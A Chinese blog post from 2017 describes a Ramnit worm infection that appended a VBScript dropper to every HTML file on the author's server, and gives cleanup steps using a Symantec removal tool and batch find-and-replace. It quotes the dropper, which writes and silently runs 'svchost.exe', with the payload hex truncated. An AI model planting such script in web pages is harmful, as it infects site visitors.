30
2017
04

HTML 感染 DropFileName = “svchost.exe” Ramnit 蠕虫病毒 查杀解决办法

最近发现vps流量疯长 看了下统计 也没看到网站有大流量,查看源码才发现网页被添加了一段很长的js 内容大概是这样


  1. <SCRIPT  Language=VBScript>  

  2.   

  3. DropFileName = “svchost.exe”  

  4.   

  5. WriteData =  

  6.   

  7. “4D5A0000200000000400000F00FFF.............................................此处省略N个字符串”  

  8.   

  9. Set FSO = CreateObject("Scripting.FileSystemObject")  

  10. DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName 

  11. If FSO.FileExists(DropPath)=False Then 

  12. Set FileObj = FSO.CreateTextFile(DropPath, True) 

  13. For i = 1 To Len(WriteData) Step 2 

  14. FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) 

  15. Next 

  16. FileObj.Close 

  17. End If 

  18. Set WSHshell = CreateObject("WScript.Shell")  

  19. WSHshell.Run DropPath, 0  

  20. //--></SCRIPT>  


到vps一看才发现 所有的 html 文件末尾都被加了一段这个代码把页面体积搞的很大 从而导致流量飙升,百度了一晚上没搞明白,第二天又搞了一天试过360杀毒根本没啥用,最后用赛门铁克的  Ramnit 蠕虫病毒 专杀工具给搞定了。下面说下解决方案


1、下载    赛门铁克的  Ramnit 蠕虫病毒 专杀工具

下载地址:https://www.symantec.com/security_response/writeup.jsp?docid=2015-022415-4725-99

下载后直接运行 点 star 即可 全盘删完后会提示重启 点 yes 重启即可。


2、用专杀工具杀完以后随机检查了几个 html 文件发现还有那段代码,不过不会像之前自己手动删了 然后里面就又被自动加上了,这说明病毒已经被杀掉了可能是文件太多,专杀工具没有全都检测得到,不过没关系可以用批量查找替换工具 ultrareplace 把网站重新查找替换一下即可。


ultrareplace 下载地址:http://www.xiazaiba.com/html/4475.html

 

目前看上去是问题解决了,还需再观察几天,尽量不要在服务器下载运行来历不明的软件,及时打补丁安装防护工具。


« 上一篇下一篇 »

相关文章:

评论列表:

1.郭晓力  2017/4/30 21:26:04 回复该留言
国平大婶转战技术大神了

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。